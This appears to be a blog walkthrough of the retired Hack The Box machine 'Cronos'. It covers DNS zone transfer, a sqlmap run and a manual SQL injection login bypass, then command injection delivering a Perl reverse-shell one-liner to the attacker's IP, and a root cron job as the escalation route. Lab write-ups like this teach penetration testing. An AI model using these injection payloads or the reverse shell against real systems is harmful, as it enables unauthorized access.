Hack the Box – Cronos Walkthrough

Today we’re going to solve another CTF machine “Cronos”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP, ISC Bind
  • IP Address: 10.10.10.13
  • Difficulty: Medium

Weakness

  • SQL Injection
  • Cron running as root

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Dig

After spending some time on enumerating directories we found nothing. So i thought to do some digging and thought to dig.

dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 311 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Nov 28 17:22:46 CET 2018
;; XFR size: 7 records (messages 1, bytes 203)

We found admin.cronos.htb and after adding that into /etc/hosts we found an administrator login page.

Login

We can try Brute Forcing with different wordlists and usernames but it didn’t work. Then we gave a shot to SQLi and tried SQLMap.

sqlmap -r sqlmap.req --level=5 --risk=3

Inside sqlmap.req we have our POST method.

POST / HTTP/1.1                                                                                                                                                      
Host: admin.cronos.htb                                                                                                                                               
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0                                                                                     
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8                                                                                              
Accept-Language: en-US,en;q=0.5                                                                                                                                      
Accept-Encoding: gzip, deflate                                                                                                                                       
Referer: http://admin.cronos.htb/                                                                                                                                    
Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3                                                                                                                         
DNT: 1                                                                                                                                                               
Connection: close                                                                                                                                                    
Upgrade-Insecure-Requests: 1                                                                                                                                         
Content-Type: application/x-www-form-urlencoded                                                                                                                      
Content-Length: 29                                                                                                                                                   
username=admin&password=admin

It appears that Username field is vulnerable to SQL injection.

OR manually we can try different methods for more info you can real OWASP SQL injection wiki.

Try admin’– – as username and use random password.

Command Injection

Since we have a command injection we can simply bypass it by placing ‘;’ in the end.

Example 6: https://www.owasp.org/index.php/Command_Injection

Let’s get a reverse shell.

Since we had Perl installed so we have to use Perl reverse shell.

;perl -e 'use Socket;$i="10.10.14.4";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we got shell.

Privilege Escalation

Since we have a user now we’re going after root. Now we have to escalate privileges to become root. Let’s run some privilege escalation scripts to get some basic information.

Normally I use LinEnum.sh script which collect some important information. After doing some research and i found that inside crontab we’ve a command schedule which runs a file as root.

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Since we have a command running inside crontab as root we can spawn php reverse shell easily.

 

Back to top button
Close